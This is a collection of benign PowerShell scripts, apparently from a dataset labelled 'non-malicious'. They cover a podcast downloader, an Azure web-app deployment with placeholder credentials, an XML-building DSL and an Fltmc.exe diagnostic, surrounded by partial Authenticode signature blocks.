AXr5dGrKkpssIHq6rrWO4PlL3OS+4ciL/l8pm+oNJXWGXYJL5H6LNnKyXJVEw/1F # bO4+Gz+U4fFFxs2S8UwvrBbYccVQ9O+Flj7xTAeITJsHptAvREqCc+/YxzhIKkA8 # 8Q8QhJKUDtazatJH7ZOdi0LCKwgqQO4H81KZGDSLktFvNRhh8ZBAenn1pW+5UBGY # z2GpgcxVXKT1CuUYdlHR9D6NrVhGqdhGTg7Og/d/8oMlPG3YjuqFxidiIsoAw2+M # hI1zXrIi56t6JkJ75J69F+lkh9myJJpNkx41sSB1XK2jJWgq7VlBuP1BuXjZ3qgy # m9r1wv0MtTCCB3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZI # hvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # MjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAy # MDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC # AQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25Phdg # M/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPF # dvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6 # GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBp # Dco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50Zu # yjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3E # XzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0 # lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1q # GFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ # +QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PA # PBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkw # EgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxG # NSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARV # MFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWlj # cm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAK # BggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMC # AYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvX # zpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20v # cGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYI # KwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG # 9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0x # M7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmC # VgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449 # xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wM # nosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDS # PeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2d # Y3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxn # GSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+Crvs # QWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokL # jzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL # 6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNN # MIICNQIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp # bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw # b3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEn # MCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOkE5MzUtMDNFMC1EOTQ3MSUwIwYDVQQD # ExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQCr # aYf1xDk2rMnU/VJo2GGK1nxo8aCBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w # IFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6d3i4DAiGA8yMDI0MDUwMjEwMDEw # NFoYDzIwMjQwNTAzMTAwMTA0WjB0MDoGCisGAQQBhFkKBAExLDAqMAoCBQDp3eLg # AgEAMAcCAQACAg+vMAcCAQACAhPGMAoCBQDp3zRgAgEAMDYGCisGAQQBhFkKBAIx # KDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJKoZI # hvcNAQELBQADggEBAAPP1l/+Ygmt05Bkmw7IHBmJle4L2HpqlEP+uNByzJvMo0PB # XXVHiiahg8RLdFawYGCX1Hb6mRwFLVOVHzYJUliUYwWTgHpZykN/UICCMPqsXPBz # hm9Gxq8FryZWnB8NJFkSPHn5kHvS1NtuG8C3LGEITml6rMsdeg6nuOrhFftQ+B57 # F414ICaDhWFc0dYVrDz8nd0Um5hHE4ljAWAo91ThZemiuhwvEZsMRH5FCYljZAXF # q0Gcnq3VKKh4llmZljWUdzX83xzcphTAMgv3kUcbTurSL1Z61xrisuDM70OppkKj # csEjFHzvdCB40KW0mWLDtTJ+Tiv1l2yXNCGkYroxggQNMIIECQIBATCBkzB8MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNy # b3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAekPcTB+XfESNgABAAAB6TAN # BglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEEMC8G # CSqGSIb3DQEJBDEiBCC2vNIIuDPt1UqGYAVP5vCb41ICBKCot8IT9JxoMarPgjCB # +gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EIKSQkniXaTcmj1TKQWF+x2U4riVo # rGD8TwmgVbN9qsQlMIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldh # c2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBD # b3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIw # MTACEzMAAAHpD3Ewfl3xEjYAAQAAAekwIgQgOn7OXvkshnUMxSZZ2miDOK7yq5lt # hRyWtGKr8dvpn/wwDQYJKoZIhvcNAQELBQAEggIAqgB9odh7w65NBD4wP2dFFbwN # wXSAI16xsZrPglHyQONOIsOxR9vyE7VKFBHqTefhQVPBwRoKrBIFv8+ZuFe5oSZT # X19urwsopCsILaZmKc1BI9/8I44Dzr2BUUKrUIgerpX32/OCUUZznDrTy67Qvv4N # c48DN9bsiruare92JQ7qDfRBVs5Dl1Wl3R1DK2BBXb0zJdx8hD8hUhJLllwfqIS7 # 3MAHYL0M5xrA0eUXZN55oF8aEPduKd35RVY3BGOQtx+pV9sOgPc71MOg7gAzjYyp # mQYWqIGTYNlFeeFB09LLDvc3glYW0k72GbW3bDB5GtuXtkhJhH/vd8ednzLpYgG/ # NhUBHsHAVhPSIy4WgDjGBjBnP+bD+cw6rsZrTK2+1xxoENek9Rakj4x8TewR5/pl # g0MW5QOYNL+MFMJxndLAjIdqFRsF3xuMWcn644GzIh3X27yfVj6nXJi8s8gXjPLn # yfOxygQ9b1AftmQuN5pth/ou4+DcerlKe7UP7zwAmQFO1kNveRuCF/Gw8uyo/Rjq # IltzvKliffxZh6wPKWRVpX2MJkphBh3dhhYImkCiGYtSWF9gC+VI+SzAWHFGnUp6 # nLdj0NoEJJSOQa1fQgOmJ38FMyYIh+R/BFuxz65eg39gmeIj+v/QfIVFpW+7Nv3x # GmO+NVbEIFwsTWddAvA= # SIG # End signature block
combined_dataset/train/non-malicious/netcast show downloader.ps1
netcast show downloader.ps1
cd M:\\Files\\Netcasts\\ShowName # switch to the diretory to store your content Import-Module BitsTransfer # enable BITS on host machine as a file transfer method $start=47 # start epidode number $end=170 # end epidode number $url="http://download.domain.com/episodes/" # URL of the download up to the directory containing the content $file_base="Podcast-" # this is the filename of the download without the show number $file_ext=".ogg" for($i=$start;$i -le $end;$i++) # start the loop, and run until end of range, inclrementing by one { $b="{0:D3}" -f $i # cast loop counter to a string, stored as a formated number with leading zeros, example 002 $file="$file_base$b$file_ext" # Concatenatesthe file name with formated loop counter + file extension Start-BitsTransfer -source $url$file; # download trigger, }
combined_dataset/train/non-malicious/903.ps1
903.ps1
$gitrepo="<replace-with-URL-of-your-own-GitHub-repo>" $gittoken="<replace-with-a-GitHub-access-token>" $webappname="mywebapp$(Get-Random)" $location="West Europe" New-AzResourceGroup -Name myResourceGroup -Location $location New-AzAppServicePlan -Name $webappname -Location $location ` -ResourceGroupName myResourceGroup -Tier Free New-AzWebApp -Name $webappname -Location $location -AppServicePlan $webappname ` -ResourceGroupName myResourceGroup $PropertiesObject = @{ token = $gittoken; } Set-AzResource -PropertyObject $PropertiesObject ` -ResourceId /providers/Microsoft.Web/sourcecontrols/GitHub -ApiVersion 2015-08-01 -Force $PropertiesObject = @{ repoUrl = "$gitrepo"; branch = "master"; } Set-AzResource -PropertyObject $PropertiesObject -ResourceGroupName myResourceGroup ` -ResourceType Microsoft.Web/sites/sourcecontrols -ResourceName $webappname/web ` -ApiVersion 2015-08-01 -Force
combined_dataset/train/non-malicious/New-XML.ps1
New-XML.ps1
### A first stab at the worlds simplest DSL: ### How to generate XML from PowerShell, in code instead of string-substitution $xlr8r = [type]::gettype("System.Management.Automation.TypeAccelerators") $xlinq = [Reflection.Assembly]::Load("System.Xml.Linq, Version=3.5.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089") $xlinq.GetTypes() | ? { $_.IsPublic -and !$_.IsSerializable -and $_.Name -ne "Extensions" } | % { $xlr8r::Add( $_.Name, $_.FullName ) } function New-Xml { Param([String]$root) New-Object XDocument (New-Object XDeclaration "1.0","utf-8","no"),( New-Object XElement $( $root # foreach($ns in $namespace){ # $name,$url = $ns -split ":",2 # New-Object XAttribute ([XNamespace]::Xmlns + $name),$url # } while($args) { $attrib, $value, $args = $args if($attrib -is [ScriptBlock]) { &$attrib } elseif ( $value -is [ScriptBlock] -and "-Content".StartsWith($attrib)) { &$value } elseif ( $value -is [XNamespace]) { New-Object XAttribute ([XNamespace]::Xmlns + $attrib.TrimStart("-")),$value } else { New-Object XAttribute $attrib.TrimStart("-"), $value } } )) } function New-Element { Param([String]$tag) New-Object XElement $( $tag while($args) { $attrib, $value, $args = $args if($attrib -is [ScriptBlock]) { &$attrib } elseif ( $value -is [ScriptBlock] -and "-Content".StartsWith($attrib)) { &$value } elseif ( $value -is [XNamespace]) { New-Object XAttribute ([XNamespace]::Xmlns + $attrib.TrimStart("-")),$value } else { New-Object XAttribute $attrib.TrimStart("-"), $value } } ) } Set-Alias xe New-Element #################################################################################################### ###### EXAMPLE SCRIPT: # [XNamespace]$dc = "http://purl.org/dc/elements/1.1" # # $xml = New-Xml rss -dc $dc -atom $atom -content $content -version "2.0" { # xe channel { # xe title {"Test RSS Feed"} # xe link {"http`://HuddledMasses.org"} # xe description {"An RSS Feed generated simply to demonstrate my XML DSL"} # xe ($dc + "language") {"en"} # xe ($dc + "creator") {"Jaykul@HuddledMasses.org"} # xe ($dc + "rights") {"Copyright 2009, CC-BY"} # xe ($dc + "date") {(Get-Date -f u) -replace " ","T"} # xe item { # xe title {"The First Item"} # xe link {"htt`p://huddledmasses.org/new-site-new-layout-lost-posts/"} # xe guid -isPermaLink true {"http`://huddledmasses.org/new-site-new-layout-lost-posts/"} # xe description {"Ema Lazarus' Poem"} # xe pubDate {(Get-Date 10/31/2003 -f u) -replace " ","T"} # } # } # } # # $xml.ToString() # ####### OUTPUT: (NOTE: I added the space in the http: to paste it here -- those aren't in the output) # <rss xmlns:dc="http ://purl.org/dc/elements/1.1" version="2.0"> # <channel> # <title>Test RSS Feed</title> # <link>http ://HuddledMasses.org</link> # <description>An RSS Feed generated simply to demonstrate my XML DSL</description> # <dc:language>en</dc:language> # <dc:creator>Jaykul@HuddledMasses.org</dc:creator> # <dc:rights>Copyright 2009, CC-BY</dc:rights> # <dc:date>2009-07-26T00:50:08Z</dc:date> # <item> # <title>The First Item</title> # <link>http ://huddledmasses.org/new-site-new-layout-lost-posts/</link> # <guid isPermaLink="true">http ://huddledmasses.org/new-site-new-layout-lost-posts/</guid> # <description>Ema Lazarus' Poem</description> # <pubDate>2003-10-31T00:00:00Z</pubDate> # </item> # </channel> # </rss>
combined_dataset/train/non-malicious/sample_1_68.ps1
sample_1_68.ps1
#- Enumerate minifilter drivers via Fltmc.exe command Function RunFltmc ($FltmcCommand, [switch]$CollectFile) { $OutputFile = $ComputerName + "_Fltmc.TXT" $CommandLineToExecute = "cmd.exe /c $FltmcCommand >> $OutputFile" #header $date=Get-Date "-" * ($CommandLineToExecute.Length + 35) + "`r`n[$date] $FltmcCommand`r`n" + "-" * ($FltmcCommand.Length + 35) | Out-File -FilePath $OutputFile -Append if($debug -eq $true){[void]$shell.popup("Command line: $CommandLineToExecute. collectFiles: " + $CollectFile.IsPresent)} RunCmD -commandToRun $CommandLineToExecute -sectionDescription "Filter Manager minifilter drivers and instances" -filesToCollect $OutputFile -fileDescription "Fltmc.exe utility output" -collectFiles $CollectFile.IsPresent } if($debug -eq $true){[void]$shell.popup("Run DC_Fltmc.ps1")} Import-LocalizedData -BindingVariable FltmcStrings Write-DiagProgress -Activity $FltmcStrings.ID_Fltmc -Status $FltmcStrings.ID_FltmcDesc $FltmcCommand = "Fltmc.exe Filters" RunFltmc -FltmcCommand $FltmcCommand $FltmcCommand = "Fltmc.exe Instances" RunFltmc -FltmcCommand $FltmcCommand # Fltmc Volumes added 08.15.14 [bbenson] $FltmcCommand = "Fltmc.exe Volumes" RunFltmc -FltmcCommand $FltmcCommand -CollectFile # SIG # Begin signature block # MIIoOQYJKoZIhvcNAQcCoIIoKjCCKCYCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCAiq2zpWzWnjsBX # tCMHMt4DbN23tGQ7tl85MG3AT8IzeKCCDYUwggYDMIID66ADAgECAhMzAAAEA73V # lV0POxitAAAAAAQDMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTEzWhcNMjUwOTExMjAxMTEzWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQCfdGddwIOnbRYUyg03O3iz19XXZPmuhEmW/5uyEN+8mgxl+HJGeLGBR8YButGV # LVK38RxcVcPYyFGQXcKcxgih4w4y4zJi3GvawLYHlsNExQwz+v0jgY/aejBS2EJY # oUhLVE+UzRihV8ooxoftsmKLb2xb7BoFS6UAo3Zz4afnOdqI7FGoi7g4vx/0MIdi # kwTn5N56TdIv3mwfkZCFmrsKpN0zR8HD8WYsvH3xKkG7u/xdqmhPPqMmnI2jOFw/ # /n2aL8W7i1Pasja8PnRXH/QaVH0M1nanL+LI9TsMb/enWfXOW65Gne5cqMN9Uofv # ENtdwwEmJ3bZrcI9u4LZAkujAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU6m4qAkpz4641iK2irF8eWsSBcBkw # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMjkyNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AFFo/6E4LX51IqFuoKvUsi80QytGI5ASQ9zsPpBa0z78hutiJd6w154JkcIx/f7r # EBK4NhD4DIFNfRiVdI7EacEs7OAS6QHF7Nt+eFRNOTtgHb9PExRy4EI/jnMwzQJV # NokTxu2WgHr/fBsWs6G9AcIgvHjWNN3qRSrhsgEdqHc0bRDUf8UILAdEZOMBvKLC # rmf+kJPEvPldgK7hFO/L9kmcVe67BnKejDKO73Sa56AJOhM7CkeATrJFxO9GLXos # oKvrwBvynxAg18W+pagTAkJefzneuWSmniTurPCUE2JnvW7DalvONDOtG01sIVAB # +ahO2wcUPa2Zm9AiDVBWTMz9XUoKMcvngi2oqbsDLhbK+pYrRUgRpNt0y1sxZsXO # raGRF8lM2cWvtEkV5UL+TQM1ppv5unDHkW8JS+QnfPbB8dZVRyRmMQ4aY/tx5x5+ # sX6semJ//FbiclSMxSI+zINu1jYerdUwuCi+P6p7SmQmClhDM+6Q+btE2FtpsU0W # +r6RdYFf/P+nK6j2otl9Nvr3tWLu+WXmz8MGM+18ynJ+lYbSmFWcAj7SYziAfT0s # IwlQRFkyC71tsIZUhBHtxPliGUu362lIO0Lpe0DOrg8lspnEWOkHnCT5JEnWCbzu # iVt8RX1IV07uIveNZuOBWLVCzWJjEGa+HhaEtavjy6i7MIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGgowghoGAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAQDvdWVXQ87GK0AAAAA # BAMwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIO2A # mRp3eH0Z5XFiZ5fxpwynojaoSyuv8qL6Bsc8z6fMMEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEAEaoruyAt5l8aFw1UG827UO2DsmlY9u0tKJkD # 0FyD1vY93LVIcfE81qa87pDMlqWQpUC20uGBT8WFUnb+MhkWuTDXXkzCTpVkLVzN # yIqTJdtI0AKE9mK+GRV7g7P8W3DGY2v9wJ5vdo2QDFbZLgwmKfLMaupLhs/atcoO # JLuFssJNMfsJNoZMdidaLBSngP3cD99kKButQD25/hOToQk1NJeG0j4dxlDCwbEd # TF93qlskj9c6Nd6KlDUoqDC9yxDnOQf2y2qbGtY7dHNuTe5yuzlhLkiU5/KhuGnG # sRhGdA5U+AfUNV9uqJA28XSowPDdLZ4z+zPzI/KCOucyqP5gQaGCF5QwgheQBgor # BgEEAYI3AwMBMYIXgDCCF3wGCSqGSIb3DQEHAqCCF20wghdpAgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFSBgsqhkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCBhE8k6hWtN6rE7slGDyM8evvXab/MN0qdI # l7+dY11LyQIGZxp6XqTtGBMyMDI0MTAyODExNDA0NS4xMjZaMASAAgH0oIHRpIHO # MIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQL # ExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxk # IFRTUyBFU046QTAwMC0wNUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1l # LVN0YW1wIFNlcnZpY2WgghHqMIIHIDCCBQigAwIBAgITMwAAAevgGGy1tu847QAB # AAAB6zANBgkqhkiG9w0BAQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx # MDAeFw0yMzEyMDYxODQ1MzRaFw0yNTAzMDUxODQ1MzRaMIHLMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l # cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046QTAwMC0w # NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Uw # 